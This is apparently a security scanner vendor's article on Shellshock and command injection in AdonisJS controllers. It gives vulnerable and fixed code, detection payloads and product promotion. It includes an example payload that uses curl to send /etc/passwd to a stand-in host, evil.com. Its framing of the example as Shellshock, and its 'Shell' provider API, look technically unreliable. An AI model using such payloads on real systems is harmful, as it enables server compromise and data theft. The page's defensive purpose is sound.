HIGH shellshockadonisjs

Shellshock in Adonisjs

Scan for shellshock in adonisjs

How Shellshock Manifests in Adonisjs

Shellshock (CVE-2014-6271) is a critical vulnerability in the Bash shell that allows arbitrary command execution via maliciously crafted environment variables. While Adonisjs itself is a Node.js framework and not directly vulnerable, applications built with Adonisjs can inherit this risk when they invoke system commands that ultimately rely on a vulnerable Bash installation. This typically occurs when Adonisjs applications use Node's child_process module (often wrapped by Adonis's Shell or Process providers) to run shell scripts or system utilities.

The attack pattern involves an adversary injecting Bash function definitions followed by malicious commands into an environment variable (e.g., HTTP_USER_AGENT). If the vulnerable Adonisjs application passes user-controlled input (like request headers or parameters) to a shell-executed command, the injected payload can execute. For example, an Adonisjs controller processing a user-supplied filename might use Shell.exec('convert ' + filename + ' output.jpg'). If filename contains a Shellshock payload, it executes when the command runs.

Adonisjs-specific risk paths include:

  • File processing routes: Controllers handling uploads or image manipulation using system tools like ImageMagick (convert, identify).
  • System integration services: Controllers that wrap legacy shell scripts for tasks like reporting or data import/export.
  • Debug or admin endpoints: Development routes that expose system command execution for testing (often left in production).

Here is a vulnerable Adonisjs controller example:

// app/Controllers/Http/ImageController.ts
import { Shell } from '@ioc:Adonis/Core/Shell'

export default class ImageController {
  public async convert({ request }) {
    const filename = request.input('file')
    // VULNERABLE: user input passed directly to shell via Shell.exec
    const output = await Shell.exec(`convert ${filename} -resize 50% output.jpg`)
    return output.stdout
  }
}

If an attacker sends file=() { :;}; /bin/bash -c 'curl http://evil.com?leak=$(cat /etc/passwd)', the Shellshock payload executes on the server, exfiltrating /etc/passwd.

AdonisJS-Specific Detection

Detecting Shellshock in Adonisjs applications requires identifying where user input flows into shell-executed commands. Manual code review should focus on any use of Shell.exec, Shell.spawn, or direct require('child_process') within Adonisjs controllers, services, or middleware. Look for concatenation or interpolation of request parameters, headers, or cookies into command strings.

Dynamic scanning is more effective. middleBrick's Input Validation check tests for command injection patterns that could trigger Shellshock. When scanning an Adonisjs API endpoint, middleBrick submits payloads like () { :;}; echo VULNERABLE in various input vectors (query params, JSON body, headers) and analyzes responses for signs of command execution (e.g., reflected payloads, error messages, timing differences).

For example, scanning the vulnerable /convert endpoint above with middleBrick would likely produce a finding under the Input Validation category with high severity, indicating potential command injection. The report includes the exact payload used and the response snippet that confirmed execution.

You can run this scan yourself using middleBrick's CLI tool:

middlebrick scan https://your-adonis-api.com/convert

Or integrate it into your CI/CD pipeline with the middleBrick GitHub Action to automatically scan staging Adonisjs deployments before merge. The action can be configured to fail the build if a high-severity command injection finding appears, preventing vulnerable code from reaching production.

middleBrick also correlates findings with your OpenAPI/Swagger spec (if available) to map vulnerable endpoints to their documented parameters, providing precise remediation guidance for Adonisjs developers.

AdonisJS-Specific Remediation

Remediating Shellshock risks in Adonisjs involves eliminating the possibility of user input reaching a shell interpreter. The primary strategy is to avoid shell execution entirely when possible. If system commands are necessary, use Node's child_process.execFile or spawn with the shell: false option (Adonisjs's Shell.exec uses a shell by default, so bypass it).

1. Use execFile for fixed commands with arguments:

// Safe: using execFile with argument array
import { execFile } from 'node:child_process'

export default class ImageController {
  public async convert({ request }) {
    const filename = request.input('file')
    // Validate filename is a simple basename without special chars
    if (!/^[a-zA-Z0-9._-]+$/.test(filename)) {
      throw new Error('Invalid filename')
    }
    // execFile does not use a shell, so no Shellshock
    const { stdout } = await new Promise((resolve, reject) => {
      execFile('convert', [filename, '-resize', '50%', 'output.jpg'], (err, out) => {
        err ? reject(err) : resolve(out)
      })
    })
    return stdout
  }
}

2. Leverage Adonisjs Validator for strict input constraints:

import { schema, rules } from '@ioc:Adonis/Core/Validator'

const convertSchema = schema.create({
  file: schema.string([
    rules.matches(/^[a-zA-Z0-9._-]+$/), // Allow only safe chars
    rules.maxLength(100)
  ])
})

// In controller
public async convert({ request, response }) {
  const validated = await this.validator.validate(convertSchema, request.all())
  // validated.file is now safe for execFile
  // ... rest of safe execFile code
}

3. Avoid passing user data as environment variables: Some Adonisjs libraries or custom code might set process.env from request data. Never do this, as Shellshock exploits environment variables.

4. Patch the underlying system: Ensure the server's Bash is updated to a version not vulnerable to Shellshock (most modern distributions are patched). However, defense-in-depth requires application-level fixes because you cannot guarantee all server environments are patched.

After applying these fixes, rescan the endpoint with middleBrick. The Input Validation finding should disappear, and your security score will improve. For continuous assurance, use middleBrick's Pro plan to monitor the endpoint regularly and receive alerts if a regression introduces a similar vulnerability.

Scan for shellshock in adonisjs Free API security scan

Frequently Asked Questions

Why is Shellshock relevant to AdonisJS applications if it's a Bash vulnerability?
AdonisJS applications can be vulnerable indirectly when they use Node.js's child_process to run shell commands that invoke a vulnerable Bash. If user input reaches these commands (e.g., via a controller that processes filenames), an attacker can exploit Shellshock to execute arbitrary code on the server, even though AdonisJS itself is written in JavaScript.
How does middleBrick detect Shellshock vulnerabilities in AdonisJS APIs?
middleBrick's Input Validation check sends crafted payloads (like '() { :;}; echo VULN') in API requests and analyzes responses for signs of command execution. It tests all input vectors (parameters, headers, JSON body) and reports any endpoint where the payload triggers a detectable effect, indicating a potential command injection path that could lead to Shellshock exploitation.

Related Pages

Shellshock in Adonisjs on AzureUnderstand Shellshock in AdonisJS on Azure, see concrete remediation code, and learn how middleBrick supports detection Shellshock in Adonisjs on CloudflareUnderstand Shellshock risks in AdonisJS behind Cloudflare, with secure coding patterns and remediation steps.Shellshock in Adonisjs on DigitaloceanExplore Shellshock risks in AdonisJS on Digitalocean, with remediation code examples and how middleBrick scans detect unShellshock in Adonisjs on AwsUnderstand Shellshock in AdonisJS on AWS, with secure patterns and AWS-specific hardening code examples.Hipaa: Shellshock in AdonisjsExplore HIPAA risks from Shellshock in AdonisJS, with concrete remediation code examples and how middleBrick detects andGdpr: Shellshock in AdonisjsExplore GDPR implications of Shellshock in Adonisjs with concrete remediation examples. Understand risks and secure codiIso 27001: Shellshock in AdonisjsExplore Shellshock risks in AdonisJS under ISO 27001, with remediation code examples and secure integration guidance.Cis: Shellshock in AdonisjsCIS, Shellshock, and AdonisJS: understand the vulnerability, see concrete AdonisJS examples, and apply secure coding praShellshock in Adonisjs with Jwt TokensShellshock risks in AdonisJS with JWT tokens, remediation examples, and secure coding practicesShellshock in Adonisjs with Basic AuthUnderstand Shellshock risks in AdonisJS with Basic Auth, and apply concrete remediation patterns. Scan APIs with middlebShellshock in Adonisjs with Api KeysUnderstand Shellshock risks in AdonisJS when API keys are used unsafely, and apply concrete code fixes to validate keys,Shellshock in Adonisjs with Mutual TlsShellshock risks with mTLS in AdonisJS: remediation, secure mTLS config, and input validation guidance.